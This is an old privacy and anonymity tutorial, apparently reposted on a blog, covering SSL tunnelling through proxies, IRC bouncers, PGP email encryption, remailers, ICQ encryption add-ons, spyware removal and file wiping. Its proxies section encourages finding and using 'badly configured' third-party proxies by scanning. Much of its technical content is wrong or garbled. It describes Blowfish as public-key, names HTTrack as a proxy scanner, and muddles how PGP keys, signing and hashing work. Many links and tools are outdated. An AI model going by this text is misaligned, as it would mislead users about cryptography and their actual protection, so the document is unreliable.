The SSL uses an encryption standard developed by RSA. RSA are a world respected American organisation that specializes in encryption and data security. Initially, they developed a cipher length of only 40 bits, for use with the Secure Socket Layer, this was considered weak and therefore a longer much more complicated encryption cipher was created, 128 bits. The reasoning behind it was simple: it needs to be secure.
The RSA site puts the advantage of a longer encryption length pretty clearly: because 40-bit encryption is considered to be relatively weak. 128-bits is about 309 septillion times ( 309,485,000,000,000,000,000,000,000 ) larger than 40-bits. This would mean it would take that many times longer to crack or break 128-bit encryption than it would 40-bit.
If you want more information on the technicalities or RSA?s SSL encryption engine, visit their site: http://www.rsasecurity.com/standards/ssl.
But what does all this encryption and security have to do with you?
Well, that?s a simple question. No matter how hard you try, at times your privacy will need to be knowingly invaded so you can make use of the product offered for doing so. If you think about food, for example, one cannot eat without swallowing. When we wish to make a transaction or view a site on the internet, where we have to give enough information away so that it happens, we also want to be assured no one else along the line gathers that data. An encrypted session would mean our data is not at the hands of any privacy perpetrators unless they knew how to decode it ? and the only ones in the know, are those you specifically wish. SSL uses public key encryption as explained in the PGP section.
To put this at a head: if you use an encrypted connection or session, you can be relatively assured that there are no prying eyes along the way.
And how do I implement SSL with SSL Tunnelling?
We know that a Secure Socket Layer is safe, but what we don?t know is what a Tunnel is. In the most simplistic form, a tunnel is a proxy. Like proxy voting in general elections, a tunnel will relay your data back and forth for you. You may be aware though, that there are already ?proxies? out there, and yes, that is true. Tunnelling is done via proxies, but it is not considered to be the same as a standard proxy relaying simply because it isn?t.
Tunnelling is very special kind of proxy relay, in that it can, and does relay data without interfering. It does this transparently and without grievance or any care for what is passing its way.
Now, if we add this ability to ?tunnel? data, any data, in a pipe, to the Secure Sockets Layer, we have a closed connection that is independent of the software carrying it; and something that is also encrypted. For those of you wanting to know a little more about the technicalities, the SSL layer is also classless in the sense it does not interferer with the data passed back and forth ? after all, it is encrypted and impossible to tamper with. That attribute means an SSL capable proxy is able to transfer data out of its ?proxied? connection to the destination required.
So to sum up, we have both a secure connection that does the job and relays things in the right direction; and we have direct tunnel that doesn?t care what we pass through it. Two very useful, and almost blind entities. All we need now is a secure proxy that we can use as the tunnel.
Proxies:
Secure proxies are alike standard proxies. We can either use an HTTP base SSL equipped proxy - one specifically designed for security HTTP traffic, but because of the ignorant nature of SSL communication, it can be bent to any needs ? or we can use a proper SSL service designed for our connection ? like you would use a secure NNTP (news) program with a secure proxy on port 563 instead of taking our long way - which would probably work as well.
A secure HTTP proxy operates on port 443. Host proxies are not public, that means they operate for, and allow only traffic from their subnet or the ISP that operates them ? but, there are many badly configured HTTP proxies and some public ones out there. The use of a program called HTTrack (available on Neworder) will aid you in scanning and searching for proxies on your network or anywhere on the Internet if your ISP does not provide you with one.
Neworder also features a number of sites dedicated to listing public proxies in the Anonymity section. While it?s often hard to find a suitable fast proxy, it?s worth the effort when you get one.
So how can I secure my connections with SSL Tunnelling?
That?s a big question, and beyond the scope out this tuition as it must come to and end. I can however, point you in the right direction of two resources that will aid you in tunnelling both IRC, and most other connections via a HTTP proxy.
For Windows, the first stop would be http://www.totalrc.net?s Socks2HTTP. This is an SSL tunnelling program that turns a normal socks proxy connection into a tunnelled SSL connection.
The second stop, for both Windows and Unix is stunnel. Stunnel is a GNU kit developed for SSL tunnelling any connection. It is available for compile and download as binary here: Stunnel homepage - http://mike.daewoo.com.pl/computer/stunnel
[ anonymity on irc ]
A BNC, or a Bouncer - is used in conjunction with IRC as a way of hiding your host when people /whois you. On most IRC networks, your host isnt masked when you whois, meaning the entire IP appears, like 194.2.0.21, which can be resolved. On other networks, your host might be masked, like IRCnetwork-0.1 but it can still give valuable information, like nationality if your host is not a IP, but a DNS resolved host, like my.host.cn would be masked to IRCnetwork-host.cn but this would still tell the person who whoised you, that you are from China.
To keep information such as this hidden from the other users on an IRC network, many people use a Bouncer, which is actually just a Proxy. Let us first draw a schematic of how a normal connection would look, with and without a BNC installed.
Without a BNC:
your.host.cn <<-->> irc.box.sk
With a BNC:
your.host.cn <<-->> my.shell.com <<-->> irc.box.sk
You will notice the difference between the two. When you have a BNC installed, a shell functions as a link between you and the IRC server (irc.box.sk as an example). You install a BNC on a shell, and set a port for it to listen for connections on. You then login to the shell with your IRC client, BitchX/Xchat/mIRC, and then it will login to the IRC server you specify - irc.box.sk in this case. In affect, this changes your host, in that it is my.shell.com that makes all the requests to irc.box.sk, and irc.box.sk doesn't know of your.host.cn, it has never even made contact with it.
In that way, depending on what host your shell has, you can login to IRC with a host like i.rule.com, these vhosts are then actually just an alias for your own machine, your.host.cn, and it is all completely transparent to the IRC server.
Many servers have sock bots that check for socket connections. These aren't BNC connections, and BNC cannot be tested using a simple bot, unless your shell has a socket port open (normally 1080) it will let you in with no problem at all, the shell is not acting as a proxy like you would expect, but more as a simple IRC proxy, or an IRC router. In one way, the BNC just changes the packet and sends it on, like:
to: my.shell.com -> to: irc.box.sk -> to: my.shell.com from: your.host.cn <- from: my.shell.com <- from: irc.box.sk The BNC simply swaps the host of your packet, saying it comes from my.shell.com. But also be aware, that your own machine is perfectly aware that it has a connection established with my.shell.com, and that YOU know that you are connected to irc.box.sk. Some BNCs are used in IRC networks, to simulate one host. If you had a global IRC network, all linked together, you could have a local server called: cn.myircnetwork.com which Chinese users would log into. It would then Bounce them to the actual network server, in effect making all users from china have the same host - cn.myircnetwork.com, masking their hosts. Of course, you could change the host too - so it didn't reveal the nationality, but it is a nice gesture of some networks, that they mask all hosts from everyone, but it makes life hard for IRCops on the network - but its a small price to pay for privacy. Note: Even if you do use IRC bouncer, within DCC transfers or chat, your IP will be revealed, because DCC requires direct IP to IP connection. Usual mistake of IRC user is to have DCC auto-reply turned on. For an attacker is then easy to DCC chat you or offer you a file, and when IRC clients are connected, he can find out your IP address in the list of his TCP/IP connections (netstat). How do I get IRC bouncer? you download and install bouncer software, or get someone to install it for you (probably the most known and best bouncer available is BNC, homepage : http://gotbnc.com/) you configure and start the software - in case it's bouncer at Unix machine, you start it on your shell account (let's say shell.somewhere.com) you open IRC and connect to the bouncer at shell.somewhere.com on the port you told it to start on. all depending on the setup, you may have to tell it your password and tell it where to connect, and you're now on irc as shell.somewhere.com instead of your regular hostname [ mail crypto ] Usually the safest way to ensure that your e-mail won't be read by unauthorised persons is to encrypt them. To be compatible with the rest of the world I'd suggest to use free PGP software. PGP (Pretty Good Privacy) is a piece of software, used to ensure that a message/file has not been changed, has not been read, and comes from the person you think it comes from. Download location: http://www.pgpi.org/ How does pgp Work? The whole idea behind PGP is that of Public and Private keys. To explain the algorithm PGP uses in order to encrypt the message would take too much time, and is beyond the scope of this, we will however look at how it ensures the integrity of the document. A user has a password, this password has to be chosen correctly, so don't choose passwords like "pop" or "iloveyou", this will make an attack more likely to succeed. The password is used to create a private key, and a public key - the algorithm ensures that you can not use the public key to make the private key. The public key is sent to a server, or to the people you send e-mails/files, and you keep the private key secret. We will use a few terms and people in this introduction, they are: Pk - Public Key, Sk - Secret Key (private key). Adam will send an e-mail to Eve, and Rita will be a person in between, who we are trying to hide the content of the mail from. Rita will intercept the email (PGP doesn't ensure that Rita cant get her hands on the package, she can - its not a secure line like other technologies) and try to read it/modify it. Adam has a Sk1 and a Pk1, and Eve has a Sk2 and a Pk2. Both Adam, Eve, and Rita have Pk1 and Pk2, but Sk1 and Sk2 are presumed to be totally secret. First, here is a schematic of how it all looks: PUBLIC SERVER Pk1, Pk2 Adam <------------------------------------------> Eve Sk1 ^ Sk2
|
|
|
|
Rita
So Adam wants to send a packet to Eve, without Rite reading it, or editing it. There are three things that we need to make sure:
That Rita cant read the text without permission
That Rita cant edit it in any way, without Eve and Adam knowing
That Even knows that Adam sent it
First thing is making sure Rita cant read the text. Adam does this by encrypting the message with Eves Pk2 which he has found on the server. You can only Encrypt with the Pk, not decrypt, so Rita wont be able to read the data unless Eve has revealed her Sk2.
The second thing to make sure, is that Rite cant edit the message. Adam creates a hash from the message he has created. The hash can be encrypted using Pk2, or sent as it is. When Eve gets the message, she decrypts it, and creates a hash herself, then checks if the hashes are the same - if they are, the message is the same, if its different, something has changed in the message. The Hash is very secure, and it is in theory impossible to make a change, and get the hash to remain the same.
The third, and probably one of the most important things to ensure, is that Rita hasn't grabbed the mail, made a new one, and sent it in Adams name. We can ensure this by using Public key and Private key too. The Sk can be used both to encrypt and to decrypt, but Pk can only encrypt. When Adam normally sends a message M to Eve, he creates the encrypted message C by doing: C=Pk2(M). This means, Adam uses Pk2 (Eves Pk) on message M to create message C. Image this: Adam can encrypt the message with his Sk1, because it is impossible to derive Sk1 from the message, this is secure and without any danger, as long as no one knows the password used to make Sk1 with. If the message M is encrypted with Sk1, he gets a message called X, Eve can decrypt the message using Pk1 which is public. If the message decrypts to something that makes sence, then it must be from Adam, because Sk1 is considered as secret, and only Adam knows it.
The entire process looks like this, when sending message C: Adam signs his digital signature on C, and hashes C: X=Sk1(C). Then Adam encrypts the message for Eve: M=Pk2(X). The message is sent, and looks all in all like this: M=Pk2(Sk1(C)). Rita can intercept M, but not decrypt, edit, or resend it. Eve receives M, and decrypts it: X=Sk2(M). Then she checks the digital signature: C=Pk1(X) and checks the Hash on the way.
This way, the PGP Public/Private key system ensures integrity and security of the document e-mail, but PGP is not the only algorithm that uses the Public/Private key theory, Blowfish, and RSA are among the many other technologies that use it, PGP is just the most popular for e-mail encryption, but many don't trust it because of rumors of backdoors by the NSA (I don't know if its true though). PGP comes in a commercial, and a freeware version for Windows, and is available for Linux as well. What ever encryption you use, it will be better than none.
[ anonymous remailers ]
Remailers are programs accessible on the Internet that route email and USENET postings anonymously (i.e., the recipient cannot determine who sent the email or posted the article). This way the sender can't be traced back by routing headers included in the e-mail. There are different classes of remailers, which allow anonymous exchange of email and anonymous posting to USENET and often many other useful features.
Resources:
Chain is a menu-driven remailer-chaining script:
http://www.obscura.com/crypto.html
Raph Levien's remailer availability page offers comprehensive information about the subject
http://www.sendfakemail.com/~raph/remailer-list.html
The Cypherpunks Remailers are being developed to provide a secure means of providing anonymity on the nets. Here you can find out about the available remailers, those which have been standard in existance for a long time as well as the new experimental remailers and anonymous servers.
http://www.csua.berkeley.edu/cypherpunks/remailer/
[ icq privacy ]
How can I keep my privacy at ICQ?
Send and receive messages via ICQ server, not directly. Every direct connection enables attacker to learn your IP. Encrypt your messages by dedicated software, encryption addons.
How to encrypt ICQ messages?
There are addons which enhance your ICQ with possibility to encrypt outcoming messages. The user on the other side needs to have the addon as well in order to decrypt your message.
Resources:
http://www.encrsoft.com/products/tsm.html
Top Secret Messenger (TSM) - trial version has only weak 8-bit encryption
http://www.planet-express.com/sven/technical/dev/chatbuddy/default.html
Chat Buddy - a freeware Windows application for encrypting chat sessions
http://www.algonet.se/~henisak/icq/encrypt-v5.txt
how encryption works in ICQ protocol v5
[ spyware ]
As we all work hard to become more savvy about protecting our personal information and keeping as anonymous as possible on the web, advertising companies are working just as hard to come up with new ways of getting our personal information. One of the ways they accomplish this is through spyware.
Spyware are applications that are bundled along with many programs that you download for free. Their function is to gather personal information about you and relay it back to advertising firms. The information is then used either to offer you products or sold to other advertisers, so they can promote THEIR products. They claim this is all they do with this information, but the problem is nobody really knows for sure.
Spyware fits the classic definition of a trojan, as it is something that you did not bargain for+when you agreed to download the product. Not only is spyware an invasion of your privacy, but (especially if you have a few different kinds on your machine) it can also chew up bandwidth, making your internet connection slower.
Sometimes, these spies really are harmless, merely connecting back to the home server to deliver+you more advertising. Some, like Gator for instance, send out detailed information about your surfing habits, operating system, income, age demographic et cetera.
Avoiding spyware
Avoiding spyware is getting harder and harder, as more software distributors are choosing it as a method of profiting from freeware and shareware distributions. Be leery of programs with cute+little icons like Gator. Also, watch those Napster wannabes like AudioGalaxy, Limewire, and Kazaa. I've yet to find one that didn't include spyware. Before you download, check to see if the program is known to contain spyware.
For a list of most known spyware, the best I've found is here:
http://www.infoforce.qc.ca/spyware/enknownlistfrm.html
Getting rid of spyware
In most cases, you can remove the spyware from your system and still use the application you downloaded. In the case of Gator and Comet Cursor, the the whole program is spyware an it must be completely removed to stop the spying.
There are several ways to get rid of spyware on your system. You can use a firewall to monitor outgoing connections. The programmers that put these things together, however, are getting sneakier and sneakier about getting them to circumvent firewalls. Comet Cursor, for instance uses an HTTP post command to connect without the intervention of a firewall. You can also install a registry monitor such as Regmon to monitor your registry for unwanted registry registry changes, but this is not foolproof either.
Probably the best method of removal is to download a spyware removal program and run it like it was a virus scanner. The best examples of these programs are:
Lavasoft's Adaware. Available at http://www.lavasoftusa.com/ Or professional cybernut Steve Gibson's OptOut. Available at: http://grc.com/optout.htm Both of these programs are free and are updated regularly.
Here are some links, if you wish to learn more about spyware:
http://www.spychecker.com/
http://grc.com/optout.htm
http://www.thebee.com/bweb/iinfo200.htm
[ cleaning tracks ]
Resources:
Burnt Cookies - allows automatic detection and optional deletion of Cookies deposited by Banner Ad web-sites
http://www.andersson-design.com/bcookies/index.shtml
Surfsecret - automatically kills files like your Internet cache files, cookies, history, temporary files, recent documents, and the contents of the Recycle Bin.
http://www.surfsecret.com/
Note: One sidenote on cleaning tracks. When you delete some files on your machine, these aren't actually deleted. Only the reference to their location in the hard drive is deleted, which makes the OS think that that location on the HD is free and ready to take things. Thus, there are ways to recover data even after you delete them.
There are however, several ways to _wipe_ this information. Programs that fill hard disk locations with zeros, then with 1s, on several passes are your best bet to make sure no document goes to the wrong hands. One of such programs is PGP. PHPi now comes with a utility that does this work, and you can even select the number of passes to wipe files. For *nix, there is also the "wipe" program. Use these when you feel you have data that needs secure cleaning.
Langganan:
Postingan (Atom)